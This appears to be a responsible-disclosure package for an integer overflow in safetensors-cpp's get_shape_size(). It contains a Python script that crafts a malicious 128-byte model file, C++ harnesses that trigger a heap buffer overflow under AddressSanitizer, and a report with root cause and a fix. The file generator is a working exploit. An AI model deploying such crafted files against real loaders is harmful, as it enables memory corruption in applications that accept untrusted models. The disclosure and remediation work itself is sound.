Upload folder using huggingface_hub

README.md

@@ -0,0 +1,32 @@
+---
+tags:
+- safetensors
+- security-research
+---
+
+# SafeTensors C++ Integer Overflow PoC
+
+**Security Research - Responsible Disclosure via huntr**
+
+## Vulnerability
+
+safetensors-cpp `get_shape_size()` multiplies shape dimensions without overflow checking.
+The Rust reference implementation uses `checked_mul` and rejects overflow.
+
+Shape `[4194305, 4194305, 211106198978564]` overflows uint64 to 4.
+Parser allocates 16 bytes, consumer iterates 4194305+ elements -> heap overflow.
+
+## ASan Result
+
+```
+AddressSanitizer: heap-buffer-overflow WRITE of size 4
+0x6020000001a0 is located 0 bytes after 16-byte region
+```
+
+## Reproduction
+
+```bash
+python3 craft_overflow.py
+g++ -std=c++17 -DSAFETENSORS_CPP_IMPLEMENTATION -fsanitize=address -I safetensors-cpp -o crash crash_overflow.cc
+./crash overflow_tensor.safetensors
+```

craft_overflow.py

@@ -0,0 +1,156 @@
+#!/usr/bin/env python3
+"""
+Craft a malicious .safetensors file that exploits integer overflow in safetensors-cpp.
+
+The safetensors format:
+  - 8 bytes: header_size as little-endian uint64
+  - header_size bytes: JSON header
+  - remaining bytes: tensor data
+
+The JSON header maps tensor names to {dtype, shape, data_offsets: [start, end]}.
+
+VULNERABILITY:
+safetensors-cpp's get_shape_size() multiplies shape dimensions without overflow checking:
+    size_t sz = 1;
+    for (size_t i = 0; i < t.shape.size(); i++) {
+        sz *= t.shape[i];   // NO checked_mul!
+    }
+
+The Rust reference implementation uses checked_mul and rejects overflow.
+
+EXPLOIT:
+Shape [4194305, 4194305, 211106198978564] has true product ~3.7e27
+but overflows uint64 to exactly 4. With F32 (4 bytes/element),
+tensor_size = 16 bytes. Validation passes because data_offsets = [0, 16].
+
+A consumer that trusts the shape dimensions (e.g., to allocate a buffer for
+reshaping/processing) would compute 4194305 * 4194305 * 211106198978564 * 4 bytes
+= a colossal allocation, or if they also overflow, get a tiny buffer that they
+then write ~3.7e27 * 4 bytes into -> heap buffer overflow.
+"""
+
+import json
+import struct
+import sys
+import os
+
+
+def craft_overflow_safetensors(output_path: str):
+    """Create a safetensors file with integer overflow in shape dimensions."""
+
+    # These shape dimensions overflow uint64 to exactly 4 elements
+    # 4194305 * 4194305 * 211106198978564 ≡ 4 (mod 2^64)
+    # Each value fits exactly in a double (JSON number)
+    shape = [4194305, 4194305, 211106198978564]
+
+    # F32 = 4 bytes per element
+    # Overflowed tensor_size = 4 * 4 = 16 bytes
+    data_size = 16
+
+    # Create the tensor data (16 bytes of actual data)
+    tensor_data = b"\x41\x41\x41\x41" * 4  # 16 bytes of 'AAAA' pattern
+
+    header = {
+        "overflow_tensor": {
+            "dtype": "F32",
+            "shape": shape,
+            "data_offsets": [0, data_size]
+        }
+    }
+
+    # Serialize header to JSON
+    # Use separators to minimize whitespace (matching safetensors convention)
+    header_json = json.dumps(header, separators=(',', ':'))
+    header_bytes = header_json.encode('utf-8')
+
+    # Pad header to 8-byte alignment
+    pad_len = (8 - len(header_bytes) % 8) % 8
+    header_bytes += b' ' * pad_len
+
+    header_size = len(header_bytes)
+
+    # Build the file
+    file_data = struct.pack('<Q', header_size) + header_bytes + tensor_data
+
+    with open(output_path, 'wb') as f:
+        f.write(file_data)
+
+    print(f"[+] Written malicious safetensors file: {output_path}")
+    print(f"    Header size: {header_size} bytes")
+    print(f"    Header JSON: {header_json}")
+    print(f"    Total file size: {len(file_data)} bytes")
+    print(f"    Shape: {shape}")
+    print(f"    True element count: {shape[0] * shape[1] * shape[2]}")
+    print(f"    Overflowed element count (mod 2^64): {(shape[0] * shape[1] * shape[2]) % (2**64)}")
+    print(f"    Overflowed tensor_size (F32, 4 bytes): {((shape[0] * shape[1] * shape[2]) % (2**64)) * 4}")
+    print(f"    Actual data size: {data_size} bytes")
+    print(f"    Validation tensor_size == data_size: {((shape[0] * shape[1] * shape[2]) % (2**64)) * 4 == data_size}")
+
+    return output_path
+
+
+def craft_normal_safetensors(output_path: str):
+    """Create a normal (benign) safetensors file for comparison."""
+    shape = [2, 2]
+    data_size = 16  # 4 elements * 4 bytes (F32)
+    tensor_data = struct.pack('<4f', 1.0, 2.0, 3.0, 4.0)
+
+    header = {
+        "normal_tensor": {
+            "dtype": "F32",
+            "shape": shape,
+            "data_offsets": [0, data_size]
+        }
+    }
+
+    header_json = json.dumps(header, separators=(',', ':'))
+    header_bytes = header_json.encode('utf-8')
+    pad_len = (8 - len(header_bytes) % 8) % 8
+    header_bytes += b' ' * pad_len
+    header_size = len(header_bytes)
+
+    file_data = struct.pack('<Q', header_size) + header_bytes + tensor_data
+
+    with open(output_path, 'wb') as f:
+        f.write(file_data)
+
+    print(f"[+] Written normal safetensors file: {output_path}")
+    print(f"    Shape: {shape}, data_size: {data_size}")
+
+
+def test_with_python_safetensors(filepath: str):
+    """Test loading with the Python/Rust safetensors implementation."""
+    try:
+        from safetensors import safe_open
+        print(f"\n[*] Testing with Python safetensors (Rust backend)...")
+        try:
+            with safe_open(filepath, framework="numpy") as f:
+                for key in f.keys():
+                    tensor = f.get_tensor(key)
+                    print(f"    Loaded tensor '{key}': shape={tensor.shape}, dtype={tensor.dtype}")
+            print("    Result: LOADED SUCCESSFULLY (unexpected for overflow file)")
+        except Exception as e:
+            print(f"    Result: REJECTED - {type(e).__name__}: {e}")
+    except ImportError:
+        print("\n[!] Python safetensors not installed, skipping Rust backend test")
+
+
+if __name__ == "__main__":
+    base_dir = os.path.dirname(os.path.abspath(__file__))
+
+    # Craft the malicious file
+    overflow_path = os.path.join(base_dir, "overflow_tensor.safetensors")
+    craft_overflow_safetensors(overflow_path)
+
+    # Craft a normal file for comparison
+    normal_path = os.path.join(base_dir, "normal_tensor.safetensors")
+    craft_normal_safetensors(normal_path)
+
+    # Test with Python/Rust implementation
+    print("\n" + "=" * 60)
+    print("DIFFERENTIAL TEST: Python/Rust safetensors")
+    print("=" * 60)
+    print("\nNormal file:")
+    test_with_python_safetensors(normal_path)
+    print("\nOverflow file:")
+    test_with_python_safetensors(overflow_path)

crash_overflow.cc

@@ -0,0 +1,126 @@
+/**
+ * crash_overflow.cc - Demonstrates actual heap corruption via integer overflow
+ *
+ * This simulates what a real consumer of safetensors-cpp would do:
+ * 1. Load a safetensors file
+ * 2. Get tensor shape
+ * 3. Allocate buffer based on shape size
+ * 4. Copy/iterate data using shape dimensions
+ *
+ * The malicious file has shape dimensions that overflow, so:
+ * - Buffer allocation uses overflowed (small) size
+ * - Data iteration uses shape dimensions that imply huge size
+ * - Result: heap buffer overflow
+ *
+ * Compile: g++ -std=c++17 -DSAFETENSORS_CPP_IMPLEMENTATION -fsanitize=address -I safetensors-cpp -o crash_overflow crash_overflow.cc
+ * Run: ./crash_overflow overflow_tensor.safetensors
+ */
+
+#include <cstdio>
+#include <cstdint>
+#include <cstdlib>
+#include <cstring>
+#include <fstream>
+#include <vector>
+
+#include "safetensors.hh"
+
+/**
+ * Simulated consumer function: reshape tensor data according to declared shape.
+ * This is what ML frameworks typically do after loading a safetensors file.
+ */
+void process_tensor(const safetensors::tensor_t &tensor, const uint8_t *data) {
+    // A real consumer would use shape to determine iteration bounds
+    size_t dtype_bytes = safetensors::get_dtype_bytes(tensor.dtype);
+
+    // Compute total elements from shape (uses the SAME vulnerable multiplication)
+    size_t total_elements = safetensors::get_shape_size(tensor);  // overflows to 4
+
+    // Allocate output buffer based on computed size
+    size_t buf_size = total_elements * dtype_bytes;  // 4 * 4 = 16 bytes
+    printf("  Allocating buffer: %zu bytes\n", buf_size);
+    float *output = (float *)malloc(buf_size);
+
+    if (!output) {
+        printf("  malloc failed\n");
+        return;
+    }
+
+    // Copy the data - this is "safe" because both use the same overflowed size
+    // But the SHAPE is what matters for downstream processing
+    memcpy(output, data + tensor.data_offsets[0], buf_size);
+
+    printf("  Buffer allocated and filled: %zu bytes\n", buf_size);
+
+    // NOW: A consumer iterates using shape dimensions for processing
+    // e.g., for reshaping, transposing, or element-wise operations
+    // This is where the overflow becomes dangerous
+    printf("  Shape claims %zu x %zu x %zu = way more than %zu elements\n",
+           tensor.shape[0], tensor.shape[1], tensor.shape[2], total_elements);
+
+    // Demonstrate: iterate first dimension only to show OOB access
+    // Even just iterating shape[0] (4194305) exceeds our 4-element buffer
+    printf("  Iterating shape[0]=%zu elements (but buffer only has %zu)...\n",
+           tensor.shape[0], total_elements);
+
+    // This writes beyond the allocated buffer -> HEAP OVERFLOW
+    // ASan will catch this immediately
+    for (size_t i = 0; i < tensor.shape[0] && i < 100; i++) {
+        output[i] = 0.0f;  // OOB write starting at index 4
+    }
+
+    printf("  OOB write triggered (ASan should report heap-buffer-overflow)\n");
+
+    free(output);
+}
+
+int main(int argc, char *argv[]) {
+    const char *filepath = "overflow_tensor.safetensors";
+    if (argc > 1) filepath = argv[1];
+
+    printf("=== safetensors-cpp Heap Overflow Crash PoC ===\n\n");
+
+    // Load file
+    std::ifstream ifs(filepath, std::ios::binary | std::ios::ate);
+    if (!ifs.is_open()) {
+        fprintf(stderr, "Failed to open %s\n", filepath);
+        return 1;
+    }
+    size_t filesize = ifs.tellg();
+    ifs.seekg(0);
+    std::vector<uint8_t> data(filesize);
+    ifs.read(reinterpret_cast<char*>(data.data()), filesize);
+    ifs.close();
+
+    // Parse
+    safetensors::safetensors_t st;
+    std::string warn, err;
+    bool ok = safetensors::load_from_memory(data.data(), data.size(), filepath, &st, &warn, &err);
+
+    if (!ok) {
+        printf("FAILED to load: %s\n", err.c_str());
+        return 1;
+    }
+
+    // Validate (this passes due to overflow)
+    std::string val_err;
+    if (!safetensors::validate_data_offsets(st, val_err)) {
+        printf("Validation failed: %s\n", val_err.c_str());
+        return 1;
+    }
+
+    printf("[+] File loaded and validated successfully\n");
+    printf("[*] Processing tensors...\n\n");
+
+    // Process each tensor
+    for (size_t i = 0; i < st.tensors.size(); i++) {
+        std::string key = st.tensors.keys()[i];
+        safetensors::tensor_t tensor;
+        st.tensors.at(i, &tensor);
+
+        printf("Processing tensor '%s':\n", key.c_str());
+        process_tensor(tensor, st.storage.data());
+    }
+
+    return 0;
+}

overflow_tensor.safetensors

@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:6691544f16c7bb866ac0f09317ac7b62581f4597b69bd8b4f88c3818983fb4b5
+size 128

report.md

@@ -0,0 +1,175 @@
+# Integer Overflow in safetensors-cpp Enables Heap Buffer Overflow via Malicious Model Files
+
+## Summary
+
+I found an integer overflow vulnerability in safetensors-cpp's `get_shape_size()` function that enables a heap buffer overflow when loading a crafted `.safetensors` model file. The function multiplies tensor shape dimensions using unchecked `size_t` arithmetic, allowing dimensions to overflow to a small value that passes all validation checks. The reference Rust implementation correctly uses `checked_mul` and rejects such files with `SafeTensorError::ValidationOverflow`.
+
+A 128-byte malicious `.safetensors` file passes safetensors-cpp's `load_from_memory()` and `validate_data_offsets()` without error. Any consuming application that uses the shape dimensions for buffer allocation or iteration will experience a heap buffer overflow. This was confirmed with AddressSanitizer.
+
+## Attack Preconditions
+
+1. The target application uses safetensors-cpp to load `.safetensors` model files
+2. The application accepts model files from untrusted sources (e.g., Hugging Face Hub, user uploads, shared model repositories)
+3. The application uses tensor shape dimensions for buffer allocation, iteration, or processing (standard behavior for ML frameworks)
+
+## Steps to Reproduce
+
+### 1. Create the malicious safetensors file
+
+```python
+# craft_overflow.py
+import json, struct
+
+shape = [4194305, 4194305, 211106198978564]
+# True product: ~3.7e27, overflows uint64 to exactly 4
+# With F32 (4 bytes): tensor_size = 16
+
+header = {"overflow_tensor": {"dtype": "F32", "shape": shape, "data_offsets": [0, 16]}}
+header_json = json.dumps(header, separators=(',', ':'))
+header_bytes = header_json.encode('utf-8')
+pad_len = (8 - len(header_bytes) % 8) % 8
+header_bytes += b' ' * pad_len
+
+with open("overflow_tensor.safetensors", "wb") as f:
+    f.write(struct.pack('<Q', len(header_bytes)) + header_bytes + b"\x41" * 16)
+```
+
+### 2. Verify the Rust reference implementation rejects it
+
+```python
+from safetensors import safe_open
+safe_open("overflow_tensor.safetensors", framework="numpy")
+# Raises: SafetensorError: Error while deserializing header: ValidationOverflow
+```
+
+### 3. Verify safetensors-cpp accepts it
+
+Compile the test program:
+```bash
+g++ -std=c++17 -DSAFETENSORS_CPP_IMPLEMENTATION -I safetensors-cpp -o test_overflow test_overflow.cc
+./test_overflow overflow_tensor.safetensors
+```
+
+Output:
+```
+[+] load_from_memory SUCCEEDED (file parsed without error)
+[*] validate_data_offsets: PASSED
+    get_shape_size() = 4  (OVERFLOWED! True value: ~3.7e27)
+    tensor_size = 4 * 4 = 16
+    tensor_size == data_size? YES (validation passes!)
+```
+
+### 4. Demonstrate heap buffer overflow with ASan
+
+```bash
+g++ -std=c++17 -DSAFETENSORS_CPP_IMPLEMENTATION -fsanitize=address -g \
+    -I safetensors-cpp -o crash_overflow crash_overflow.cc
+./crash_overflow overflow_tensor.safetensors
+```
+
+Output:
+```
+[+] File loaded and validated successfully
+Processing tensor 'overflow_tensor':
+  Allocating buffer: 16 bytes
+  Shape claims 4194305 x 4194305 x 211106198978564 = way more than 4 elements
+  Iterating shape[0]=4194305 elements (but buffer only has 4)...
+
+==33302==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6020000001a0
+WRITE of size 4 at 0x6020000001a0 thread T0
+0x6020000001a0 is located 0 bytes after 16-byte region [0x602000000190,0x6020000001a0)
+SUMMARY: AddressSanitizer: heap-buffer-overflow crash_overflow.cc:69
+```
+
+## Root Cause Analysis
+
+The vulnerability is in `safetensors.hh` in the `get_shape_size()` function (line ~4616):
+
+```cpp
+size_t get_shape_size(const tensor_t &t) {
+  // ...
+  size_t sz = 1;
+  for (size_t i = 0; i < t.shape.size(); i++) {
+    sz *= t.shape[i];   // UNCHECKED MULTIPLICATION - can silently overflow
+  }
+  return sz;
+}
+```
+
+A second unchecked multiplication occurs in `validate_data_offsets()` (line ~4666):
+
+```cpp
+size_t tensor_size = get_dtype_bytes(tensor.dtype) * get_shape_size(tensor);
+```
+
+The reference Rust implementation uses safe arithmetic that detects overflow:
+
+```rust
+let nelements: usize = info.shape.iter().copied()
+    .try_fold(1usize, usize::checked_mul)
+    .ok_or(SafeTensorError::ValidationOverflow)?;
+```
+
+### Why the overflow works
+
+The crafted shape `[4194305, 4194305, 211106198978564]` produces:
+- True product: 3,713,821,298,447,761,542,108,676,100 (~3.7 x 10^27)
+- `uint64` maximum: 18,446,744,073,709,551,615 (~1.8 x 10^19)
+- After overflow (mod 2^64): exactly **4**
+
+All three values are below 2^53 (9,007,199,254,740,992), ensuring they are exactly representable as JSON double-precision numbers and survive parsing without precision loss.
+
+With F32 dtype (4 bytes per element): `tensor_size = 4 * 4 = 16 bytes`
+Setting `data_offsets = [0, 16]` makes `tensor_size == data_size`, so validation passes.
+
+## Remediation
+
+Add overflow checking to `get_shape_size()`:
+
+```cpp
+size_t get_shape_size(const tensor_t &t) {
+  if (t.shape.empty()) return 1;
+  if (t.shape.size() >= kMaxDim) return 0;
+
+  size_t sz = 1;
+  for (size_t i = 0; i < t.shape.size(); i++) {
+    if (t.shape[i] != 0 && sz > SIZE_MAX / t.shape[i]) {
+      return 0;  // overflow would occur
+    }
+    sz *= t.shape[i];
+  }
+  return sz;
+}
+```
+
+Also add overflow checking in `validate_data_offsets()` for the `dtype_bytes * shape_size` multiplication:
+
+```cpp
+size_t shape_size = get_shape_size(tensor);
+size_t dtype_bytes = get_dtype_bytes(tensor.dtype);
+if (shape_size != 0 && dtype_bytes > SIZE_MAX / shape_size) {
+    ss << "Tensor size overflow for '" << key << "'\n";
+    valid = false;
+    continue;
+}
+size_t tensor_size = dtype_bytes * shape_size;
+```
+
+## References
+
+- safetensors-cpp: https://github.com/syoyo/safetensors-cpp
+- Rust reference (with checked_mul): https://github.com/huggingface/safetensors/blob/main/safetensors/src/tensor.rs
+- Trail of Bits audit of safetensors: https://huggingface.co/docs/safetensors/en/audit_results
+- CWE-190: Integer Overflow or Wraparound: https://cwe.mitre.org/data/definitions/190.html
+
+## Impact
+
+This vulnerability allows an attacker to craft a malicious `.safetensors` model file that:
+
+1. **Passes all validation** in safetensors-cpp (load + validate_data_offsets)
+2. **Is rejected** by the Rust reference implementation (cross-implementation differential)
+3. **Causes heap buffer overflow** in any consuming application that uses shape dimensions for memory operations
+
+The attack surface is significant because `.safetensors` is the primary model format for Hugging Face models. Any C++ application loading models from untrusted sources (model hubs, user uploads, federated learning) is vulnerable. The malicious file is only 128 bytes and indistinguishable from a legitimate safetensors file without overflow-aware validation.
+
+Severity: **High** (CWE-190 leading to heap overflow / potential RCE in C++ applications)

test_overflow.cc

@@ -0,0 +1,151 @@
+/**
+ * test_overflow.cc - Demonstrates integer overflow vulnerability in safetensors-cpp
+ *
+ * This program loads a malicious .safetensors file where shape dimensions
+ * are crafted to overflow uint64 multiplication in get_shape_size().
+ *
+ * The file passes safetensors-cpp validation because:
+ *   shape = [4194305, 4194305, 211106198978564]
+ *   get_shape_size() = 4194305 * 4194305 * 211106198978564 (overflows to 4)
+ *   tensor_size = 4 * sizeof(F32) = 16 bytes
+ *   data_offsets = [0, 16] -> data_size = 16 bytes
+ *   tensor_size == data_size -> VALIDATION PASSES
+ *
+ * But the declared shape claims ~3.7 * 10^27 elements.
+ *
+ * IMPACT: Any code that trusts the shape for buffer allocation or iteration
+ * will either:
+ *   (a) Attempt a massive allocation (DoS / OOM)
+ *   (b) If they also overflow, allocate a tiny buffer and write OOB (heap overflow)
+ *   (c) Iterate over wrong number of elements, causing OOB reads
+ *
+ * Compile: g++ -std=c++17 -I safetensors-cpp -o test_overflow test_overflow.cc
+ */
+
+#include <cstdio>
+#include <cstdint>
+#include <cstdlib>
+#include <cstring>
+#include <fstream>
+#include <vector>
+#include <iostream>
+#include <limits>
+
+#include "safetensors.hh"
+
+int main(int argc, char *argv[]) {
+    const char *filepath = "overflow_tensor.safetensors";
+    if (argc > 1) {
+        filepath = argv[1];
+    }
+
+    printf("=== safetensors-cpp Integer Overflow PoC ===\n\n");
+
+    // Read file into memory
+    std::ifstream ifs(filepath, std::ios::binary | std::ios::ate);
+    if (!ifs.is_open()) {
+        fprintf(stderr, "Failed to open %s\n", filepath);
+        return 1;
+    }
+    size_t filesize = ifs.tellg();
+    ifs.seekg(0);
+    std::vector<uint8_t> data(filesize);
+    ifs.read(reinterpret_cast<char*>(data.data()), filesize);
+    ifs.close();
+
+    printf("[*] Loaded file: %s (%zu bytes)\n", filepath, filesize);
+
+    // Parse with safetensors-cpp
+    safetensors::safetensors_t st;
+    std::string warn, err;
+
+    bool ok = safetensors::load_from_memory(data.data(), data.size(),
+                                             filepath, &st, &warn, &err);
+
+    if (!ok) {
+        printf("[!] load_from_memory FAILED: %s\n", err.c_str());
+        return 1;
+    }
+
+    if (!warn.empty()) {
+        printf("[!] Warnings: %s\n", warn.c_str());
+    }
+
+    printf("[+] load_from_memory SUCCEEDED (file parsed without error)\n\n");
+
+    // Validate data offsets (this is the check that should catch overflow)
+    std::string val_err;
+    bool valid = safetensors::validate_data_offsets(st, val_err);
+    printf("[*] validate_data_offsets: %s\n", valid ? "PASSED" : "FAILED");
+    if (!valid) {
+        printf("    Error: %s\n", val_err.c_str());
+    }
+
+    // Examine the tensor
+    for (size_t i = 0; i < st.tensors.size(); i++) {
+        std::string key = st.tensors.keys()[i];
+        safetensors::tensor_t tensor;
+        st.tensors.at(i, &tensor);
+
+        printf("\n[*] Tensor: '%s'\n", key.c_str());
+        printf("    dtype: F32\n");
+        printf("    shape: [");
+        for (size_t j = 0; j < tensor.shape.size(); j++) {
+            if (j > 0) printf(", ");
+            printf("%zu", tensor.shape[j]);
+        }
+        printf("]\n");
+        printf("    data_offsets: [%zu, %zu]\n", tensor.data_offsets[0], tensor.data_offsets[1]);
+
+        // Show the overflow
+        size_t shape_size = safetensors::get_shape_size(tensor);
+        size_t dtype_bytes = safetensors::get_dtype_bytes(tensor.dtype);
+        size_t tensor_size = dtype_bytes * shape_size;
+
+        printf("\n    [OVERFLOW ANALYSIS]\n");
+        printf("    get_shape_size() = %zu  (OVERFLOWED! True value: ~3.7e27)\n", shape_size);
+        printf("    get_dtype_bytes() = %zu\n", dtype_bytes);
+        printf("    tensor_size = %zu * %zu = %zu\n", dtype_bytes, shape_size, tensor_size);
+        printf("    data_size = %zu\n", tensor.data_offsets[1] - tensor.data_offsets[0]);
+        printf("    tensor_size == data_size? %s\n",
+               tensor_size == (tensor.data_offsets[1] - tensor.data_offsets[0]) ? "YES (validation passes!)" : "NO");
+
+        // Demonstrate the danger: a naive consumer trusting shape
+        printf("\n    [IMPACT DEMONSTRATION]\n");
+        printf("    A consumer that trusts shape dimensions would compute:\n");
+        printf("    shape[0] * shape[1] * shape[2] = ");
+
+        // Use __int128 or manual check to show the true product
+        __uint128_t true_product = (__uint128_t)tensor.shape[0] * tensor.shape[1] * tensor.shape[2];
+        printf("OVERFLOW (too large for uint64)\n");
+        printf("    True product > UINT64_MAX: %s\n",
+               true_product > ((__uint128_t)UINT64_MAX) ? "YES" : "NO");
+
+        // Simulate what a consumer would do
+        printf("\n    [SIMULATED CONSUMER BEHAVIOR]\n");
+
+        // Scenario 1: Consumer uses shape for allocation (overflows to small buffer)
+        size_t alloc_size = 1;
+        for (size_t j = 0; j < tensor.shape.size(); j++) {
+            alloc_size *= tensor.shape[j];  // Same overflow!
+        }
+        alloc_size *= dtype_bytes;
+        printf("    Consumer alloc (overflowed): %zu bytes (tiny!)\n", alloc_size);
+        printf("    Consumer thinks tensor has: %zu * %zu * %zu = ~3.7e27 elements\n",
+               tensor.shape[0], tensor.shape[1], tensor.shape[2]);
+
+        // Show it: allocate the overflowed-size buffer, then show what happens
+        // when iterating over shape dimensions
+        printf("\n    If consumer allocates %zu bytes but iterates shape[0]*shape[1]*shape[2] times:\n", alloc_size);
+        printf("    -> HEAP BUFFER OVERFLOW (writing ~3.7e27 * 4 bytes into %zu byte buffer)\n", alloc_size);
+        printf("    This is a critical memory safety vulnerability.\n");
+    }
+
+    printf("\n=== DIFFERENTIAL RESULT ===\n");
+    printf("  Rust (reference): REJECTS file with SafeTensorError::ValidationOverflow\n");
+    printf("  C++ (safetensors-cpp): ACCEPTS file, validation passes\n");
+    printf("  Impact: A model file that Rust deems invalid is accepted by C++\n");
+    printf("          The shape values cause integer overflow, enabling heap corruption\n");
+
+    return 0;
+}